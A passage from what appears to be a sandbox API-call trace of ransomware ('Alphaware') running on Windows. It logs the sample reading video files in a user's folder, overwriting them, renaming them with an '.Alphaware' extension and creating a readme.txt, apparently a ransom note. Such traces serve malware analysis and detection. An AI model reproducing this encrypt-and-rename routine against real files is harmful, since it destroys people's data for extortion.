dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\36j-o6P YBS6oejEQ.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\36j-o6p ybs6oejeq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972c0c30, ftCreationTime.dwHighDateTime=0x1d96f0b, ftLastAccessTime.dwLowDateTime=0xc684eaa0, ftLastAccessTime.dwHighDateTime=0x1d973fd, ftLastWriteTime.dwLowDateTime=0x879f7ca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20e0)) returned 1 [0089.633] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\36j-o6P YBS6oejEQ.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\36j-o6p ybs6oejeq.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\36j-o6P YBS6oejEQ.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\36j-o6p ybs6oejeq.mkv.alphaware")) returned 1 [0089.634] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.636] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\fewwX8m-79kNjEM35.flv", dwFileAttributes=0x80) returned 1 [0089.637] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\fewwX8m-79kNjEM35.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fewwx8m-79knjem35.flv"), fInfoLevelId=0x0, lpFileInformation=0x24a4410 | out: lpFileInformation=0x24a4410*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf74bd090, ftCreationTime.dwHighDateTime=0x1d96d81, ftLastAccessTime.dwLowDateTime=0xb56b190, ftLastAccessTime.dwHighDateTime=0x1d96e45, ftLastWriteTime.dwLowDateTime=0xb56b190, ftLastWriteTime.dwHighDateTime=0x1d96e45, nFileSizeHigh=0x0, nFileSizeLow=0xfde1)) returned 1 [0089.637] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\fewwX8m-79kNjEM35.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fewwx8m-79knjem35.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.637] ReadFile (in: hFile=0x250, lpBuffer=0x24a46b8, nNumberOfBytesToRead=0xfde1, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24a46b8*, lpNumberOfBytesRead=0x23e9f8*=0xfde1, lpOverlapped=0x0) returned 1 [0089.686] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\fewwX8m-79kNjEM35.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fewwx8m-79knjem35.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.697] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\fewwX8m-79kNjEM35.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fewwx8m-79knjem35.flv"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74bd090, ftCreationTime.dwHighDateTime=0x1d96d81, ftLastAccessTime.dwLowDateTime=0xb56b190, ftLastAccessTime.dwHighDateTime=0x1d96e45, ftLastWriteTime.dwLowDateTime=0x87a90220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15360)) returned 1 [0089.698] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\fewwX8m-79kNjEM35.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fewwx8m-79knjem35.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\fewwX8m-79kNjEM35.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fewwx8m-79knjem35.flv.alphaware")) returned 1 [0089.699] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\FPYG UZhtS1g3J.mp4", dwFileAttributes=0x80) returned 1 [0089.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\FPYG UZhtS1g3J.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fpyg uzhts1g3j.mp4"), fInfoLevelId=0x0, lpFileInformation=0x25617f0 | out: lpFileInformation=0x25617f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9f4e83f0, ftCreationTime.dwHighDateTime=0x1d96b57, ftLastAccessTime.dwLowDateTime=0x237e5820, ftLastAccessTime.dwHighDateTime=0x1d975ea, ftLastWriteTime.dwLowDateTime=0x237e5820, ftLastWriteTime.dwHighDateTime=0x1d975ea, nFileSizeHigh=0x0, nFileSizeLow=0x6167)) returned 1 [0089.699] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\FPYG UZhtS1g3J.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fpyg uzhts1g3j.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.699] ReadFile (in: hFile=0x250, lpBuffer=0x2561a88, nNumberOfBytesToRead=0x6167, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2561a88*, lpNumberOfBytesRead=0x23e9f8*=0x6167, lpOverlapped=0x0) returned 1 [0089.761] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\FPYG UZhtS1g3J.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fpyg uzhts1g3j.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.771] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\FPYG UZhtS1g3J.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fpyg uzhts1g3j.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f4e83f0, ftCreationTime.dwHighDateTime=0x1d96b57, ftLastAccessTime.dwLowDateTime=0x237e5820, ftLastAccessTime.dwHighDateTime=0x1d975ea, ftLastWriteTime.dwLowDateTime=0x87b4e900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x82b4)) returned 1 [0089.772] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\FPYG UZhtS1g3J.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fpyg uzhts1g3j.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\FPYG UZhtS1g3J.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\fpyg uzhts1g3j.mp4.alphaware")) returned 1 [0089.773] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi", dwFileAttributes=0x80) returned 1 [0089.774] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\imfelcc5b-e2ysl3zf.avi"), fInfoLevelId=0x0, lpFileInformation=0x242b430 | out: lpFileInformation=0x242b430*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x561df5c0, ftCreationTime.dwHighDateTime=0x1d96c39, ftLastAccessTime.dwLowDateTime=0xbeabf30, ftLastAccessTime.dwHighDateTime=0x1d972ae, ftLastWriteTime.dwLowDateTime=0xbeabf30, ftLastWriteTime.dwHighDateTime=0x1d972ae, nFileSizeHigh=0x0, nFileSizeLow=0x49db)) returned 1 [0089.774] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\imfelcc5b-e2ysl3zf.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.774] ReadFile (in: hFile=0x250, lpBuffer=0x242b6e8, nNumberOfBytesToRead=0x49db, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x242b6e8*, lpNumberOfBytesRead=0x23e9f8*=0x49db, lpOverlapped=0x0) returned 1 [0089.862] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi", nBufferLength=0x105, lpBuffer=0x23e360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi", lpFilePart=0x0) returned 0x40 [0089.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0089.862] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\imfelcc5b-e2ysl3zf.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.864] GetFileType (hFile=0x250) returned 0x1 [0089.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0089.864] GetFileType (hFile=0x250) returned 0x1 [0089.864] WriteFile (in: hFile=0x250, lpBuffer=0x24dc5d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24dc5d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.866] WriteFile (in: hFile=0x250, lpBuffer=0x24dc5d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24dc5d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.866] WriteFile (in: hFile=0x250, lpBuffer=0x24dc5d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24dc5d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.866] WriteFile (in: hFile=0x250, lpBuffer=0x24dc5d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24dc5d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.867] WriteFile (in: hFile=0x250, lpBuffer=0x24dc5d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24dc5d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.867] WriteFile (in: hFile=0x250, lpBuffer=0x24dc5d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8d8, lpOverlapped=0x0 | out: lpBuffer=0x24dc5d0*, lpNumberOfBytesWritten=0x23e8d8*=0x1000, lpOverlapped=0x0) returned 1 [0089.867] WriteFile (in: hFile=0x250, lpBuffer=0x24dc5d0*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x24dc5d0*, lpNumberOfBytesWritten=0x23e8b8*=0x348, lpOverlapped=0x0) returned 1 [0089.867] CloseHandle (hObject=0x250) returned 1 [0089.869] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi", nBufferLength=0x105, lpBuffer=0x23e5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi", lpFilePart=0x0) returned 0x40 [0089.870] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi.Alphaware", nBufferLength=0x105, lpBuffer=0x23e5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi.Alphaware", lpFilePart=0x0) returned 0x4a [0089.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0089.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\imfelcc5b-e2ysl3zf.avi"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x561df5c0, ftCreationTime.dwHighDateTime=0x1d96c39, ftLastAccessTime.dwLowDateTime=0xbeabf30, ftLastAccessTime.dwHighDateTime=0x1d972ae, ftLastWriteTime.dwLowDateTime=0x87c33140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6348)) returned 1 [0089.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0089.870] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\imfelcc5b-e2ysl3zf.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\IMFeLCc5b-E2ysl3zF.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\imfelcc5b-e2ysl3zf.avi.alphaware")) returned 1 [0089.879] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi", nBufferLength=0x105, lpBuffer=0x23e660, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi", lpFilePart=0x0) returned 0x33 [0089.879] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi", dwFileAttributes=0x80) returned 1 [0089.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0089.880] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\roobm.avi"), fInfoLevelId=0x0, lpFileInformation=0x24ddfb8 | out: lpFileInformation=0x24ddfb8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x57417410, ftCreationTime.dwHighDateTime=0x1d9678c, ftLastAccessTime.dwLowDateTime=0x3bec9a50, ftLastAccessTime.dwHighDateTime=0x1d9732b, ftLastWriteTime.dwLowDateTime=0x3bec9a50, ftLastWriteTime.dwHighDateTime=0x1d9732b, nFileSizeHigh=0x0, nFileSizeLow=0x989c)) returned 1 [0089.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0089.880] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi", nBufferLength=0x105, lpBuffer=0x23e430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi", lpFilePart=0x0) returned 0x33 [0089.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0089.880] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\roobm.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.881] GetFileType (hFile=0x250) returned 0x1 [0089.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0089.881] GetFileType (hFile=0x250) returned 0x1 [0089.881] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x989c [0089.881] ReadFile (in: hFile=0x250, lpBuffer=0x24de200, nNumberOfBytesToRead=0x989c, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24de200*, lpNumberOfBytesRead=0x23e9f8*=0x989c, lpOverlapped=0x0) returned 1 [0089.883] CloseHandle (hObject=0x250) returned 1 [0089.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0089.954] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\roobm.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.955] GetFileType (hFile=0x250) returned 0x1 [0089.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0089.956] GetFileType (hFile=0x250) returned 0x1 [0089.956] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.957] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.958] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.958] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.958] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.959] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.959] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.959] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.960] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.960] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.960] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.960] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0089.961] WriteFile (in: hFile=0x250, lpBuffer=0x2593650*, nNumberOfBytesToWrite=0xc48, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2593650*, lpNumberOfBytesWritten=0x23e8b8*=0xc48, lpOverlapped=0x0) returned 1 [0089.961] CloseHandle (hObject=0x250) returned 1 [0089.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0089.964] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\roobm.avi"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57417410, ftCreationTime.dwHighDateTime=0x1d9678c, ftLastAccessTime.dwLowDateTime=0x3bec9a50, ftLastAccessTime.dwHighDateTime=0x1d9732b, ftLastWriteTime.dwLowDateTime=0x87d17980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcc48)) returned 1 [0089.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0089.964] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\roobm.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\ROOBM.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\roobm.avi.alphaware")) returned 1 [0089.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0089.965] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR", nBufferLength=0x105, lpBuffer=0x23e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR", lpFilePart=0x0) returned 0x29 [0089.965] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zu2JIWj2WW\\yQlR\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\zu2jiwj2ww\\yqlr\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c44650, ftCreationTime.dwHighDateTime=0x1d96b12, ftLastAccessTime.dwLowDateTime=0x87d17980, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87d17980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c44650, ftCreationTime.dwHighDateTime=0x1d96b12, ftLastAccessTime.dwLowDateTime=0x87d17980, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87d17980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972c0c30, ftCreationTime.dwHighDateTime=0x1d96f0b, ftLastAccessTime.dwLowDateTime=0xc684eaa0, ftLastAccessTime.dwHighDateTime=0x1d973fd, ftLastWriteTime.dwLowDateTime=0x879f7ca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="36j-o6P YBS6oejEQ.mkv.Alphaware", cAlternateFileName="36J-O6~1.ALP")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f2e8f20, ftCreationTime.dwHighDateTime=0x1d96d96, ftLastAccessTime.dwLowDateTime=0x1b820b90, ftLastAccessTime.dwHighDateTime=0x1d974f4, ftLastWriteTime.dwLowDateTime=0x1b820b90, ftLastWriteTime.dwHighDateTime=0x1d974f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUSZ", cAlternateFileName="")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74bd090, ftCreationTime.dwHighDateTime=0x1d96d81, ftLastAccessTime.dwLowDateTime=0xb56b190, ftLastAccessTime.dwHighDateTime=0x1d96e45, ftLastWriteTime.dwLowDateTime=0x87a90220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15360, dwReserved0=0x0, dwReserved1=0x0, cFileName="fewwX8m-79kNjEM35.flv.Alphaware", cAlternateFileName="FEWWX8~1.ALP")) returned 1 [0089.966] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: 